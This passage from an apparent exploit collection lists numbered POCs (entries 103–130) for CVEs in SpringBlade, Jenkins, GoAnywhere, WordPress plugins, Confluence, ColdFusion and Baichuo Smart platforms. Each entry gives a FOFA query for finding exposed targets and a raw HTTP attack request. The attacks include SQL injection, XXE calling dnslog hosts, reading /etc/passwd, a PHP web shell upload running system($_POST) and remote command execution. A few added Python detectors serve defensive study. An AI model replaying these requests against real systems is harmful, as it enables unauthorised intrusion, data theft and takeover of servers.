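Entry 103 hides the XXE inside the base64 SAMLRequest parameter, so a filter that looks for <!DOCTYPE in the raw request body sees nothing. The Python below is an added example (not part of the original post or of any vendor code) that decodes the SAML message from a form body, handling both the HTTP-POST binding (plain base64) and the HTTP-Redirect binding (base64 of raw DEFLATE), and reports DTD constructs and external SYSTEM identifiers. The malicious sample is the POC's own SAMLRequest; the benign AuthnRequest is constructed.

```python
import base64
import re
import zlib
from urllib.parse import unquote

# The SAMLRequest parameter from the POC above (the page's own value).
POC_BODY = (
    "SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Constructed, benign AuthnRequest for comparison.
BENIGN_XML = (
    b'<?xml version="1.0"?><samlp:AuthnRequest '
    b'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0"/>'
)

DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
SYSTEM_ID = re.compile(rb'<!ENTITY[^>]*?SYSTEM\s*"([^"]+)"', re.IGNORECASE)


def form_fields(body: str) -> dict:
    """Split a form-encoded body without the '+' -> ' ' translation, so raw base64
    ('+' and '/' are alphabet characters) survives; percent-escapes are decoded."""
    out = {}
    for part in body.split("&"):
        name, _, value = part.partition("=")
        out[unquote(name)] = unquote(value)
    return out


def decode_saml_message(value: str) -> bytes:
    """Return the XML behind a SAMLRequest/SAMLResponse value.

    Try the Redirect binding (raw DEFLATE) first; anything that does not inflate
    to XML is taken as the POST binding's plain base64.
    """
    raw = base64.b64decode(value.replace(" ", "+"))  # tolerate '+' mangled to space
    try:
        inflated = zlib.decompress(raw, -15)  # -15: raw DEFLATE, no zlib header
        if inflated.lstrip().startswith(b"<"):
            return inflated
    except zlib.error:
        pass
    return raw


def encode_post_binding(xml: bytes) -> str:
    """SAMLRequest value as the POST binding sends it."""
    return base64.b64encode(xml).decode()


def encode_redirect_binding(xml: bytes) -> str:
    """SAMLRequest value as the Redirect binding sends it (raw DEFLATE, then base64)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml) + comp.flush()).decode()


def inspect_body(body: str) -> dict:
    """Report DTD constructs and external SYSTEM identifiers in a SAML message."""
    fields = form_fields(body)
    for name in ("SAMLRequest", "SAMLResponse"):
        if name not in fields:
            continue
        xml = decode_saml_message(fields[name])
        dtd = sorted({m.group(0).upper().decode() for m in DTD_MARKERS.finditer(xml)})
        return {
            "param": name,
            "dtd": dtd,
            "external_urls": [u.decode() for u in SYSTEM_ID.findall(xml)],
            # A SAML message never legitimately carries a DTD; any DTD is a finding.
            "suspicious": bool(dtd),
        }
    return {"param": None, "dtd": [], "external_urls": [], "suspicious": False}


if __name__ == "__main__":
    print(inspect_body(POC_BODY))
```

The same decode-then-inspect step is what the vulnerable endpoint's XML parser should have done with DTD processing disabled; on the detection side, the extracted SYSTEM URL is the indicator to pivot on in DNS and proxy logs.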

104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://b ladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

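In entries 105 to 107 the SQL is not in a parameter value but in the parameter name: updatexml(...)=1 arrives as a query-string key, the tell-tale of a query builder that maps request keys straight onto column names of the generated WHERE clause. Value-centric WAF rules miss this. The Python below is an added example (not from the original post or the SpringBlade project) that audits request targets for keys that are not plain identifiers, alongside the usual value-side token check; the sample targets are constructed from the shape of the POCs above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Shape of a well-formed filter/list parameter name: an identifier, optionally
# with dotted or bracketed sub-keys (e.g. "query.name", "ids[0]").
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_.\[\]]*$")

# Tokens that have no business in a filter name or value. Kept narrow (function
# calls, a few keywords, comment openers, numeric tautologies) to limit noise.
SQL_TOKENS = re.compile(
    r"\b(?:updatexml|extractvalue|sleep|benchmark|concat|version|database|load_file)\s*\("
    r"|\b(?:union|select|information_schema)\b"
    r"|--|/\*|\bor\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)

# Constructed request targets; the first two follow the dict-biz/list and
# tenant/list POCs above, the rest are ordinary traffic plus a value-side probe.
SAMPLE_TARGETS = [
    "/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1",
    "/api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1",
    "/api/blade-system/dict-biz/list?code=sex&dictValue=1",
    "/api/blade-system/tenant/list?tenantName=test&1%3D1%20and%20sleep(5)=1",
    "/api/blade-user/export-user?account=admin",
    "/api/blade-system/dict-biz/list?code=a'%20union%20select%201--",
]


def audit_query(target: str) -> list:
    """Return [(where, text, why)] for suspicious parts of one request target.

    'where' is "key" or "value"; a non-identifier key is reported even without
    SQL tokens, because a key is never user-free-text in a list endpoint.
    """
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if not IDENT.match(key):
            why = "non-identifier key"
            if SQL_TOKENS.search(key):
                why += " with SQL tokens"
            findings.append(("key", key, why))
        elif SQL_TOKENS.search(key):
            findings.append(("key", key, "SQL tokens in key"))
        if SQL_TOKENS.search(value):
            findings.append(("value", value, "SQL tokens in value"))
    return findings


def audit_all(targets) -> dict:
    """Map each flagged target to its findings; clean targets are omitted."""
    out = {}
    for target in targets:
        findings = audit_query(target)
        if findings:
            out[target] = findings
    return out


if __name__ == "__main__":
    for target, findings in audit_all(SAMPLE_TARGETS).items():
        print(target)
        for where, text, why in findings:
            print("   ", where, why, repr(text))
```

The server-side fix is the same test applied before the query builder runs: only keys from a known allow-list may become column names, everything else is a 400, which closes the key-position injection regardless of how the value is escaped.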
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Upload side (carries the CLI arguments; "@/etc/passwd" is expanded by args4j into the contents of that file):
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

Download side (same Session id; the response carries the command output):
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The expanded file lines come back as arguments of the help command: the first line as the default COMMAND, the second in the "Too many arguments" error:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

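The upload body in entry 109 is the Jenkins plain-CLI framing: each frame is a 4-byte big-endian payload length, one opcode byte and the payload, with strings in Java writeUTF form (2-byte length prefix). The Python below is an added example (not part of the original post or of Jenkins itself) that rebuilds the POC's byte string from its arguments and parses such a stream back, so the @file argument that args4j expands can be picked out of captured traffic; the opcode numbers are read off the POC bytes, and the stream constants are the POC's own.

```python
import struct

# Opcodes of the Jenkins plain-CLI framing behind /cli?remoting=false, as they
# appear in the POC bytes above: ARG=0, LOCALE=1, ENCODING=2, START=3.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}

# The upload body from the POC, byte for byte, for comparison.
POC_STREAM = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def java_utf(s: str) -> bytes:
    """DataOutputStream.writeUTF shape: 2-byte big-endian length + UTF-8 bytes
    (identical to Java's modified UTF-8 for the ASCII strings used here)."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op: int, payload: bytes = b"") -> bytes:
    """One frame: 4-byte big-endian payload length, 1 opcode byte, payload.
    The length covers the payload only, which is why START is 00 00 00 00 03."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload(args, encoding="GBK", locale="en_US") -> bytes:
    """Upload-side stream for `jenkins-cli <args>`, in the POC's frame order."""
    stream = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    stream += frame(OP_ENCODING, java_utf(encoding))
    stream += frame(OP_LOCALE, java_utf(locale))
    return stream + frame(OP_START)


def parse_frames(stream: bytes) -> list:
    """Decode a stream into [(opcode_name, text)]; raises ValueError if truncated."""
    frames, i = [], 0
    while i < len(stream):
        if len(stream) - i < 5:
            raise ValueError("truncated frame header at offset %d" % i)
        (length,) = struct.unpack(">I", stream[i:i + 4])
        op = stream[i + 4]
        payload = stream[i + 5:i + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated payload at offset %d" % i)
        text = ""
        if len(payload) >= 2:
            (ulen,) = struct.unpack(">H", payload[:2])
            text = payload[2:2 + ulen].decode("utf-8")
        frames.append((OP_NAMES.get(op, "OP%d" % op), text))
        i += 5 + length
    return frames


def is_well_formed(stream: bytes) -> bool:
    """True if the whole stream parses as complete frames."""
    try:
        parse_frames(stream)
        return True
    except ValueError:
        return False


def file_read_args(frames) -> list:
    """ARG values beginning with '@': args4j expands them to the named file's
    contents, which is what CVE-2024-23897 abuses. On an unauthenticated
    /cli request any entry here is the alert; the path tells you what was read."""
    return [text[1:] for op, text in frames if op == "ARG" and text.startswith("@")]


if __name__ == "__main__":
    assert build_upload(["help", "@/etc/passwd"]) == POC_STREAM
    for op, text in parse_frames(POC_STREAM):
        print(op, repr(text))
    print("files requested:", file_read_args(parse_frames(POC_STREAM)))
```

Feeding the upload side of a captured /cli?remoting=false exchange to parse_frames and then file_read_args gives the list of files an attacker asked the server to expand; a non-empty list from a source without a valid Jenkins session is the detection.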
110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ path segment is the filter bypass: if the initial account setup wizard renders, it is reachable without authentication.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce from the front page
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

({{rand8}} is a template placeholder for a random eight-character filename.)

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then request /home/src.php (the path given in txt_path).

119. Beijing Baichuo (北京百绰) Smart S20 back-end sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The file is written to /upload/2.php.

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
